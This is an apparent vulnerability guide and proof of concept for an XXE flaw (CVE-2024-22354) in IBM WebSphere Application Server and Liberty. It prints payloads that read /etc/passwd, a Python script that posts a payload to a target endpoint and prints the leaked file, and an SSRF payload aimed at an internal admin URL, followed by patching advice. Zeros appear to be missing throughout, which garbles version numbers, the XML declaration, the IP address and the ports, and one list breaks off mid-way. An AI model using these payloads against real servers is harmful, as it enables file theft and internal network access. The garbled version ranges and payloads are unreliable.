CVE-2024-22354 - Understanding and Exploiting XXE in IBM WebSphere Application Server (XXE Vulnerability Guide & PoC)

CVE-2024-22354 is a newly discovered security vulnerability affecting IBM WebSphere Application Server versions 8.5, 9., and WebSphere Liberty distributions from 17...3 up through 24...5. The issue is a classic XML External Entity (XXE) Injection flaw that can be remotely exploited. Attackers can abuse this to steal sensitive information, conduct server-side request forgery (SSRF), or consume resources on the server.

This article dives deep into CVE-2024-22354 with a simple explanation, reference links, code snippets, and a straightforward proof-of-concept (PoC) to illustrate the risk.

What is XML External Entity (XXE) Injection?

XXE is a security flaw that arises when an application processes XML input insecurely, allowing attackers to reference local or remote resources via special XML constructs called "entities." When vulnerable, applications may:

- Leak server files (like /etc/passwd)

WebSphere Liberty 17...3 through 24...5

Up-to-date advisory information can be found in IBM’s official security bulletin:
IBM Security Bulletin: XXE vulnerability in WebSphere Application Server (CVE-2024-22354)

Technical Details

When these IBM WebSphere instances process user-supplied XML, they do not sufficiently disable the parsing of external entities. This allows an attacker to submit specially crafted XML that can make the server read local files or connect to arbitrary internal/external resources.

Example Malicious XML Payload

Suppose your WebSphere instance exposes a web service or endpoint that accepts XML payloads (for example, SOAP, REST using XML, upload functionality, or even SAML). An attacker can send the following:

<?xml version="1." ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
    <name>&xxe;</name>
</user>

If the server is vulnerable, it will process the external entity, substitute &xxe; with the file content, and leak /etc/passwd in its processing result or logs.

Suppose there’s a WebSphere-based REST or SOAP endpoint at

POST http://target.ibm:908/insecureApp/xmlParser
Content-Type: application/xml

Exploit code using Python

import requests

xml_payload = '''<?xml version="1." ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
    <name>&xxe;</name>
</user>
'''

r = requests.post(
    "http://target.ibm:908/insecureApp/xmlParser",
    data=xml_payload,
    headers={'Content-Type': 'application/xml'}
)
print(r.text)

If the server is vulnerable, you’ll see /etc/passwd dumped in the response or error.

To demonstrate SSRF, you can try

<?xml version="1."?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127...1:808/admin">; ]>
<user>
    <name>&xxe;</name>
</user>

If the application fetches content from the target URL, you may find sensitive internal access or secrets.

What Should You Do?

- Patch Immediately: IBM released fixes for all supported versions. Official Patch Info
- Disable DTD/Entity Parsing: Validate your application disables entity resolution in all XML parsers.

References

- IBM X-Force ID: 280401
- IBM Security Bulletin - CVE-2024-22354
- OWASP XXE Cheat Sheet

Conclusion

CVE-2024-22354 serves as a sharp reminder of the dangers of insecure XML processing. If your systems use IBM WebSphere Application Server or WebSphere Liberty and handle XML, patch now. Always validate external data, keep your server updated, and monitor for unusual XML activity. This vulnerability is easy to exploit but has devastating consequences if left unchecked.

Timeline

Published on: 04/17/2024 01:15:06 UTC
Last modified on: 06/28/2024 20:07:50 UTC